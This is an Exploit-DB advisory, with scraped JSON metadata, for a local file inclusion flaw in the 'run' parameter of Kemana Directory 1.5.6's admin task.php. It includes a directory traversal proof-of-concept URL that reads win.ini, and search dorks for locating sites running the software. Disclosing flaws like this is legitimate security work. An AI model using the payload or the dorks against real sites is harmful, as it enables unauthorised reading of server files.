Kemana Directory 1.5.6 - run param Local File Inclusion Vulnerability
2014-03-25T00:00:00
ID EDB-ID:32508 Type exploitdb Reporter LiquidWorm Modified 2014-03-25T00:00:00
Description
Kemana Directory 1.5.6 - (run param) Local File Inclusion Vulnerability. Webapps exploit for php platform
Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 1.5.6
Summary: Experience the ultimate directory script solution
with Kemana. Create your own Yahoo or Dmoz easily with Kemana.
Unique Kemana's features including: CMS engine based on our
qEngine, multiple directories support, user friendly administration
control panel, easy to use custom fields, unsurpassed flexibility.
Desc: Kemana suffers from an authenticated file inclusion vulnerability
(LFI) when input passed thru the 'run' parameter to task.php is
not properly verified before being used to include files. This can
be exploited to include files from local resources with directory
traversal attacks.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5177
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5177.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
http://localhost/kemana/admin/task.php?run=../../../../../../windows/win.ini
{"id": "EDB-ID:32508", "hash": "10a158c462112203b408d6dead3efbe7", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Kemana Directory 1.5.6 - run param Local File Inclusion Vulnerability", "description": "Kemana Directory 1.5.6 - (run param) Local File Inclusion Vulnerability. Webapps exploit for php platform", "published": "2014-03-25T00:00:00", "modified": "2014-03-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/32508/", "reporter": "LiquidWorm", "references": [], "cvelist": [], "lastseen": "2016-02-03T17:09:14", "history": [], "viewCount": 0, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-02-03T17:09:14"}, "dependencies": {"references": [], "modified": "2016-02-03T17:09:14"}, "vulnersScore": -0.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/32508/", "sourceData": "\r\nKemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability\r\n\r\n\r\nVendor: C97net\r\nProduct web page: http://www.c97.net\r\nAffected version: 1.5.6\r\n\r\nSummary: Experience the ultimate directory script solution\r\nwith Kemana. Create your own Yahoo or Dmoz easily with Kemana.\r\nUnique Kemana's features including: CMS engine based on our\r\nqEngine, multiple directories support, user friendly administration\r\ncontrol panel, easy to use custom fields, unsurpassed flexibility.\r\n\r\nDesc: Kemana suffers from an authenticated file inclusion vulnerability\r\n(LFI) when input passed thru the 'run' parameter to task.php is\r\nnot properly verified before being used to include files. This can\r\nbe exploited to include files from local resources with directory\r\ntraversal attacks.\r\n\r\n\r\nTested on: Apache/2.4.7 (Win32)\r\n PHP/5.5.6\r\n MySQL 5.6.14\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2014-5177\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5177.php\r\n\r\n\r\nDork #1: intitle:powered by c97.net\r\nDork #2: intitle:powered by qEngine\r\nDork #3: intitle:powered by Kemana.c97.net\r\nDork #4: intitle:powered by Cart2.c97.net\r\n\r\n\r\n\r\n07.03.2014\r\n\r\n---\r\n\r\n\r\nhttp://localhost/kemana/admin/task.php?run=../../../../../../windows/win.ini\r\n", "osvdbidlist": ["105108"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}